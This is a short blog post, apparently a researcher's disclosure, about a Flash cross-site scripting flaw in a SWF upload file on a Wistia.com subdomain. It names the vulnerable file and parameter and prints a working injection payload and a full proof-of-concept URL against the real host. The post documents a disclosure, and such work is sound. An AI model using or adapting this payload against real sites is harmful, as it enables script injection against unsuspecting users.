/ / / Flash Cross Site Scripting (XSS)

Flash Cross Site Scripting (XSS)

, Edit
Hello friend today i am sharing my POC on flash XSS which i found in Wistia.com sub-domain i was just going through sites and found this one and just started testing it and in first shot reported 2 HTML injection's and i was like :D hahhaha so started testing for some other Bus too so after that i thought that this is a video hosting site and it may have a SWF file so started digging in to it and found a vulnerable SWF file in there Premium team Login site :D

here is the POC and the Exploit which is already Published :-

Exploit :-

http://1337day.com/exploit/20669

Vulnerable URL :-


Vulnerable File :-

swfupload2.swf

Vulnerable Parameter :-

?movieName=

Payload Used :-

"]);}catch(e){}if(!self.a)self.a=!alert('XSS-Osama-Mahmood');//


POC Url :-

https://fast.wistia.com/flash/swfupload2.swf?movieName="]);}catch(e){}if(!self.a)self.a=!alert('XSS-Osama-Mahmood');//

But sadly i forgot to make the Screen Shot :\ so this is it.

Thanks
Share on Google Plus
Unknown

About Unknown

Hi , This is Osama Mahmood and i will share all my knowledge and skills on #infosec with you and hope you will enjoy learning new and unique things. follow me on twitter @OsamaMahmood007
    Blogger Comment
    Facebook Comment

2 comments:

Subscribe to: Post Comments ( Atom )